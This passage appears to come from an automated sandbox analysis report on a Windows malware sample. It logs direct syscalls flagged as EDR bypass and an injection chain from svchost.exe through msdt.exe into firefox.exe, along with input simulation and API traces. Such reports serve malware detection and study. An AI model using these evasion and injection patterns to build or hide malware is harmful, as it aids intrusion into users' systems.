Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]	2_2_03538BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]	2_2_03538BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]	2_2_03538BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355EBFC mov eax, dword ptr fs:[00000030h]	2_2_0355EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_035BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540BBE mov eax, dword ptr fs:[00000030h]	2_2_03540BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540BBE mov eax, dword ptr fs:[00000030h]	2_2_03540BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_035E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_035E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540A5B mov eax, dword ptr fs:[00000030h]	2_2_03540A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540A5B mov eax, dword ptr fs:[00000030h]	2_2_03540A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035ACA72 mov eax, dword ptr fs:[00000030h]	2_2_035ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035ACA72 mov eax, dword ptr fs:[00000030h]	2_2_035ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]	2_2_0356CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]	2_2_0356CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]	2_2_0356CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DEA60 mov eax, dword ptr fs:[00000030h]	2_2_035DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BCA11 mov eax, dword ptr fs:[00000030h]	2_2_035BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03554A35 mov eax, dword ptr fs:[00000030h]	2_2_03554A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03554A35 mov eax, dword ptr fs:[00000030h]	2_2_03554A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356CA38 mov eax, dword ptr fs:[00000030h]	2_2_0356CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356CA24 mov eax, dword ptr fs:[00000030h]	2_2_0356CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355EA2E mov eax, dword ptr fs:[00000030h]	2_2_0355EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530AD0 mov eax, dword ptr fs:[00000030h]	2_2_03530AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03564AD0 mov eax, dword ptr fs:[00000030h]	2_2_03564AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03564AD0 mov eax, dword ptr fs:[00000030h]	2_2_03564AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]	2_2_03586ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]	2_2_03586ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]	2_2_03586ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356AAEE mov eax, dword ptr fs:[00000030h]	2_2_0356AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356AAEE mov eax, dword ptr fs:[00000030h]	2_2_0356AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03568A90 mov edx, dword ptr fs:[00000030h]	2_2_03568A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604A80 mov eax, dword ptr fs:[00000030h]	2_2_03604A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538AA0 mov eax, dword ptr fs:[00000030h]	2_2_03538AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538AA0 mov eax, dword ptr fs:[00000030h]	2_2_03538AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03586AA4 mov eax, dword ptr fs:[00000030h]	2_2_03586AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B0946 mov eax, dword ptr fs:[00000030h]	2_2_035B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604940 mov eax, dword ptr fs:[00000030h]	2_2_03604940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D4978 mov eax, dword ptr fs:[00000030h]	2_2_035D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D4978 mov eax, dword ptr fs:[00000030h]	2_2_035D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BC97C mov eax, dword ptr fs:[00000030h]	2_2_035BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]	2_2_03556962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]	2_2_03556962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]	2_2_03556962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0357096E mov eax, dword ptr fs:[00000030h]	2_2_0357096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0357096E mov edx, dword ptr fs:[00000030h]	2_2_0357096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0357096E mov eax, dword ptr fs:[00000030h]	2_2_0357096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BC912 mov eax, dword ptr fs:[00000030h]	2_2_035BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03528918 mov eax, dword ptr fs:[00000030h]	2_2_03528918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03528918 mov eax, dword ptr fs:[00000030h]	2_2_03528918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE908 mov eax, dword ptr fs:[00000030h]	2_2_035AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE908 mov eax, dword ptr fs:[00000030h]	2_2_035AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B892A mov eax, dword ptr fs:[00000030h]	2_2_035B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C892B mov eax, dword ptr fs:[00000030h]	2_2_035C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035649D0 mov eax, dword ptr fs:[00000030h]	2_2_035649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_035FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C69C0 mov eax, dword ptr fs:[00000030h]	2_2_035C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035629F9 mov eax, dword ptr fs:[00000030h]	2_2_035629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035629F9 mov eax, dword ptr fs:[00000030h]	2_2_035629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_035BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B89B3 mov esi, dword ptr fs:[00000030h]	2_2_035B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B89B3 mov eax, dword ptr fs:[00000030h]	2_2_035B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B89B3 mov eax, dword ptr fs:[00000030h]	2_2_035B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035309AD mov eax, dword ptr fs:[00000030h]	2_2_035309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035309AD mov eax, dword ptr fs:[00000030h]	2_2_035309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03560854 mov eax, dword ptr fs:[00000030h]	2_2_03560854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534859 mov eax, dword ptr fs:[00000030h]	2_2_03534859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534859 mov eax, dword ptr fs:[00000030h]	2_2_03534859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03542840 mov ecx, dword ptr fs:[00000030h]	2_2_03542840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BE872 mov eax, dword ptr fs:[00000030h]	2_2_035BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BE872 mov eax, dword ptr fs:[00000030h]	2_2_035BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C6870 mov eax, dword ptr fs:[00000030h]	2_2_035C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C6870 mov eax, dword ptr fs:[00000030h]	2_2_035C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BC810 mov eax, dword ptr fs:[00000030h]	2_2_035BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]	2_2_03552835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]	2_2_03552835

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00C280A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_00C280A9

Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BFA124 SetUnhandledExceptionFilter,		0_2_00BFA124
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BFA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00BFA155

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtTerminateThread: Direct from: 0x76EF2FCC	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtProtectVirtualMemory: Direct from: 0x76EE7B2E	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtAllocateVirtualMemory: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Section loaded: NULL target: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Section loaded: NULL target: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\msdt.exe

Thread register set: target process: 4072

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\msdt.exe

Thread APC queued: target process: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2A8C008

Jump to behavior

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00C287B1 LogonUserW,

0_2_00C287B1

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00BD3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00BD3B3A

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00BD48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00BD48D7

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00C34C53 mouse_event,

0_2_00C34C53

Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rACq8Eaix6.exe"	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	Process created: C:\Windows\SysWOW64\msdt.exe "C:\Windows\SysWOW64\msdt.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00C27CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00C27CAF

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00C2874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00C2874B

Source: rACq8Eaix6.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: HSGhOUKfqFw.exe, 00000004.00000002.3912349293.0000000000B61000.00000002.00000001.00040000.00000000.sdmp, HSGhOUKfqFw.exe, 00000004.00000000.2415790548.0000000000B61000.00000002.00000001.00040000.00000000.sdmp, HSGhOUKfqFw.exe, 00000007.00000002.3912793804.0000000001941000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: rACq8Eaix6.exe, HSGhOUKfqFw.exe, 00000004.00000002.3912349293.0000000000B61000.00000002.00000001.00040000.00000000.sdmp, HSGhOUKfqFw.exe, 00000004.00000000.2415790548.0000000000B61000.00000002.00000001.00040000.00000000.sdmp, HSGhOUKfqFw.exe, 00000007.00000002.3912793804.0000000001941000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: HSGhOUKfqFw.exe, 00000004.00000002.3912349293.0000000000B61000.00000002.00000001.00040000.00000000.sdmp, HSGhOUKfqFw.exe, 00000004.00000000.2415790548.0000000000B61000.00000002.00000001.00040000.00000000.sdmp, HSGhOUKfqFw.exe, 00000007.00000002.3912793804.0000000001941000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: HSGhOUKfqFw.exe, 00000004.00000002.3912349293.0000000000B61000.00000002.00000001.00040000.00000000.sdmp, HSGhOUKfqFw.exe, 00000004.00000000.2415790548.0000000000B61000.00000002.00000001.00040000.00000000.sdmp, HSGhOUKfqFw.exe, 00000007.00000002.3912793804.0000000001941000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00BF862B cpuid

0_2_00BF862B

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00C04E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00C04E87

